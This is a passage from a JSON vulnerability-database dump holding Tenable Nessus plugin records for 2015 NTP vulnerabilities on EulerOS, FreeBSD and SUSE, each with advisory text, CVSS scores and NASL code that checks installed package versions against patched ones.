["CVE-2015-7855", "CVE-2015-7976", "CVE-2015-7850"], "modified": "2019-04-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:uvp:2.5.3"], "id": "EULEROS_SA-2019-1230.NASL", "href": "https://www.tenable.com/plugins/nessus/123698", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123698);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-7850\",\n \"CVE-2015-7855\",\n \"CVE-2015-7976\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.3 : ntp (EulerOS-SA-2019-1230)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.i1/4^CVE-2015-7976i1/4%0\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.i1/4^CVE-2015-7850i1/4%0\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.i1/4^CVE-2015-7855i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78e46c99\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7976\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.3\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.3\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-25.0.1.h19\",\n \"ntpdate-4.2.6p5-25.0.1.h19\",\n \"sntp-4.2.6p5-25.0.1.h19\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T10:49:46", "description": "ntp.org reports :\n\nNTF's NTP Project has been notified of the following 13 low- and\nmedium-severity vulnerabilities that are fixed in ntp-4.2.8p4,\nreleased on Wednesday, 21 October 2015 :\n\n- Bug 2941 CVE-2015-7871 NAK to the Future: Symmetric association\nauthentication bypass via crypto-NAK (Cisco ASIG)\n\n- Bug 2922 CVE-2015-7855 decodenetnum() will ASSERT botch instead of\nreturning FAIL on some bogus values (IDA)\n\n- Bug 2921 CVE-2015-7854 Password Length Memory Corruption\nVulnerability. (Cisco TALOS)\n\n- Bug 2920 CVE-2015-7853 Invalid length data provided by a custom\nrefclock driver could cause a buffer overflow. (Cisco TALOS)\n\n- Bug 2919 CVE-2015-7852 ntpq atoascii() Memory Corruption\nVulnerability. (Cisco TALOS)\n\n- Bug 2918 CVE-2015-7851 saveconfig Directory Traversal Vulnerability.\n(OpenVMS) (Cisco TALOS)\n\n- Bug 2917 CVE-2015-7850 remote config logfile-keyfile. (Cisco TALOS)\n\n- Bug 2916 CVE-2015-7849 trusted key use-after-free. (Cisco TALOS)\n\n- Bug 2913 CVE-2015-7848 mode 7 loop counter underrun. (Cisco TALOS)\n\n- Bug 2909 CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC. (Tenable)\n\n- Bug 2902 : CVE-2015-7703 configuration directives 'pidfile' and\n'driftfile' should only be allowed locally. (RedHat)\n\n- Bug 2901 : CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\nshould validate the origin timestamp field. (Boston University)\n\n- Bug 2899 : CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\nautokey data packet length checks. (Tenable)\n\nThe only generally-exploitable bug in the above list is the crypto-NAK\nbug, which has a CVSS2 score of 6.4.\n\nAdditionally, three bugs that have already been fixed in ntp-4.2.8 but\nwere not fixed in ntp-4.2.6 as it was EOL'd have a security component,\nbut are all below 1.8 CVSS score, so we're reporting them here :\n\n- Bug 2382 : Peer precision < -31 gives division by zero\n\n- Bug 1774 : Segfaults if cryptostats enabled when built without\nOpenSSL\n\n- Bug 1593 : ntpd abort in free() with logconfig syntax error", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-22T00:00:00", "title": "FreeBSD : ntp -- 13 low- and medium-severity vulnerabilities (c4a18a12-77fc-11e5-a687-206a8a720317)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "modified": "2015-10-22T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ntp-devel", "p-cpe:/a:freebsd:freebsd:ntp"], "id": "FREEBSD_PKG_C4A18A1277FC11E5A687206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/86519", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86519);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7701\", \"CVE-2015-7702\", \"CVE-2015-7703\", \"CVE-2015-7704\", \"CVE-2015-7705\", \"CVE-2015-7848\", \"CVE-2015-7849\", \"CVE-2015-7850\", \"CVE-2015-7851\", \"CVE-2015-7852\", \"CVE-2015-7853\", \"CVE-2015-7854\", \"CVE-2015-7855\", \"CVE-2015-7871\");\n script_xref(name:\"FreeBSD\", value:\"SA-15:25.ntp\");\n script_xref(name:\"TRA\", value:\"TRA-2015-04\");\n\n script_name(english:\"FreeBSD : ntp -- 13 low- and medium-severity vulnerabilities (c4a18a12-77fc-11e5-a687-206a8a720317)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"ntp.org reports :\n\nNTF's NTP Project has been notified of the following 13 low- and\nmedium-severity vulnerabilities that are fixed in ntp-4.2.8p4,\nreleased on Wednesday, 21 October 2015 :\n\n- Bug 2941 CVE-2015-7871 NAK to the Future: Symmetric association\nauthentication bypass via crypto-NAK (Cisco ASIG)\n\n- Bug 2922 CVE-2015-7855 decodenetnum() will ASSERT botch instead of\nreturning FAIL on some bogus values (IDA)\n\n- Bug 2921 CVE-2015-7854 Password Length Memory Corruption\nVulnerability. (Cisco TALOS)\n\n- Bug 2920 CVE-2015-7853 Invalid length data provided by a custom\nrefclock driver could cause a buffer overflow. (Cisco TALOS)\n\n- Bug 2919 CVE-2015-7852 ntpq atoascii() Memory Corruption\nVulnerability. (Cisco TALOS)\n\n- Bug 2918 CVE-2015-7851 saveconfig Directory Traversal Vulnerability.\n(OpenVMS) (Cisco TALOS)\n\n- Bug 2917 CVE-2015-7850 remote config logfile-keyfile. (Cisco TALOS)\n\n- Bug 2916 CVE-2015-7849 trusted key use-after-free. (Cisco TALOS)\n\n- Bug 2913 CVE-2015-7848 mode 7 loop counter underrun. (Cisco TALOS)\n\n- Bug 2909 CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC. (Tenable)\n\n- Bug 2902 : CVE-2015-7703 configuration directives 'pidfile' and\n'driftfile' should only be allowed locally. (RedHat)\n\n- Bug 2901 : CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\nshould validate the origin timestamp field. (Boston University)\n\n- Bug 2899 : CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\nautokey data packet length checks. (Tenable)\n\nThe only generally-exploitable bug in the above list is the crypto-NAK\nbug, which has a CVSS2 score of 6.4.\n\nAdditionally, three bugs that have already been fixed in ntp-4.2.8 but\nwere not fixed in ntp-4.2.6 as it was EOL'd have a security component,\nbut are all below 1.8 CVSS score, so we're reporting them here :\n\n- Bug 2382 : Peer precision < -31 gives division by zero\n\n- Bug 1774 : Segfaults if cryptostats enabled when built without\nOpenSSL\n\n- Bug 1593 : ntpd abort in free() with logconfig syntax error\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fec88bd0\"\n );\n # https://vuxml.freebsd.org/freebsd/c4a18a12-77fc-11e5-a687-206a8a720317.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?43b814f1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2015-04\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.8p4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ntp-devel<4.3.76\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:23:11", "description": "This ntp update provides the following security and non security \nfixes :\n\n - Update to 4.2.8p4 to fix several security issues\n (bsc#951608) :\n\n - CVE-2015-7871: NAK to the Future: Symmetric association\n authentication bypass via crypto-NAK\n\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead\n of returning FAIL on some bogus values\n\n - CVE-2015-7854: Password Length Memory Corruption\n Vulnerability\n\n - CVE-2015-7853: Invalid length data provided by a custom\n refclock driver could cause a buffer overflow\n\n - CVE-2015-7852 ntpq atoascii() Memory Corruption\n Vulnerability\n\n - CVE-2015-7851 saveconfig Directory Traversal\n Vulnerability\n\n - CVE-2015-7850 remote config logfile-keyfile\n\n - CVE-2015-7849 trusted key use-after-free\n\n - CVE-2015-7848 mode 7 loop counter underrun\n\n - CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC\n\n - CVE-2015-7703 configuration directives 'pidfile' and\n 'driftfile' should only be allowed locally\n\n - CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\n should validate the origin timestamp field\n\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\n autokey data packet length checks\n\n - Use ntpq instead of deprecated ntpdc in start-ntpd\n (bnc#936327).\n\n - Add a controlkey to ntp.conf to make the above work.\n\n - Improve runtime configuration :\n\n - Read keytype from ntp.conf\n\n - Don't write ntp keys to syslog.\n\n - Don't let 'keysdir' lines in ntp.conf trigger the 'keys'\n parser.\n\n - Fix the comment regarding addserver in ntp.conf\n (bnc#910063).\n\n - Remove ntp.1.gz, it wasn't installed anymore.\n\n - Remove ntp-4.2.7-rh-manpages.tar.gz and only keep\n ntptime.8.gz. The rest is partially irrelevant,\n partially redundant and potentially outdated\n (bsc#942587).\n\n - Remove 'kod' from the restrict line in ntp.conf\n (bsc#944300).\n\n - Use SHA1 instead of MD5 for symmetric keys (bsc#905885).\n\n - Require perl-Socket6 (bsc#942441).\n\n - Fix incomplete backporting of 'rcntp ntptimemset'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-23T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : ntp (SUSE-SU-2015:2058-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "modified": "2015-11-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ntp-doc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2015-2058-1.NASL", "href": "https://www.tenable.com/plugins/nessus/87010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:2058-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87010);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7691\", \"CVE-2015-7692\", \"CVE-2015-7701\", \"CVE-2015-7702\", \"CVE-2015-7703\", \"CVE-2015-7704\", \"CVE-2015-7705\", \"CVE-2015-7848\", \"CVE-2015-7849\", \"CVE-2015-7850\", \"CVE-2015-7851\", \"CVE-2015-7852\", \"CVE-2015-7853\", \"CVE-2015-7854\", \"CVE-2015-7855\", \"CVE-2015-7871\");\n script_xref(name:\"TRA\", value:\"TRA-2015-04\");\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : ntp (SUSE-SU-2015:2058-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This ntp update provides the following security and non security \nfixes :\n\n - Update to 4.2.8p4 to fix several security issues\n (bsc#951608) :\n\n - CVE-2015-7871: NAK to the Future: Symmetric association\n authentication bypass via crypto-NAK\n\n - CVE-2015-7855: decodenetnum() will ASSERT botch instead\n of returning FAIL on some bogus values\n\n - CVE-2015-7854: Password Length Memory Corruption\n Vulnerability\n\n - CVE-2015-7853: Invalid length data provided by a custom\n refclock driver could cause a buffer overflow\n\n - CVE-2015-7852 ntpq atoascii() Memory Corruption\n Vulnerability\n\n - CVE-2015-7851 saveconfig Directory Traversal\n Vulnerability\n\n - CVE-2015-7850 remote config logfile-keyfile\n\n - CVE-2015-7849 trusted key use-after-free\n\n - CVE-2015-7848 mode 7 loop counter underrun\n\n - CVE-2015-7701 Slow memory leak in CRYPTO_ASSOC\n\n - CVE-2015-7703 configuration directives 'pidfile' and\n 'driftfile' should only be allowed locally\n\n - CVE-2015-7704, CVE-2015-7705 Clients that receive a KoD\n should validate the origin timestamp field\n\n - CVE-2015-7691, CVE-2015-7692, CVE-2015-7702 Incomplete\n autokey data packet length checks\n\n - Use ntpq instead of deprecated ntpdc in start-ntpd\n (bnc#936327).\n\n - Add a controlkey to ntp.conf to make the above work.\n\n - Improve runtime configuration :\n\n - Read keytype from ntp.conf\n\n - Don't write ntp keys to syslog.\n\n - Don't let 'keysdir' lines in ntp.conf trigger the 'keys'\n parser.\n\n - Fix the comment regarding addserver in ntp.conf\n (bnc#910063).\n\n - Remove ntp.1.gz, it wasn't installed anymore.\n\n - Remove ntp-4.2.7-rh-manpages.tar.gz and only keep\n ntptime.8.gz. The rest is partially irrelevant,\n partially redundant and potentially outdated\n (bsc#942587).\n\n - Remove 'kod' from the restrict line in ntp.conf\n (bsc#944300).\n\n - Use SHA1 instead of MD5 for symmetric keys (bsc#905885).\n\n - Require perl-Socket6 (bsc#942441).\n\n - Fix incomplete backporting of 'rcntp ntptimemset'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=905885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942441\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=951608\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7691/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7692/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7701/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7702/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7703/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7704/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7705/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7848/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7849/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7850/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7851/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7852/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7854/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7855/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7871/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20152058-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b9441511\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2015-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-ntp-12218=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-ntp-12218=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-ntp-12218=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = 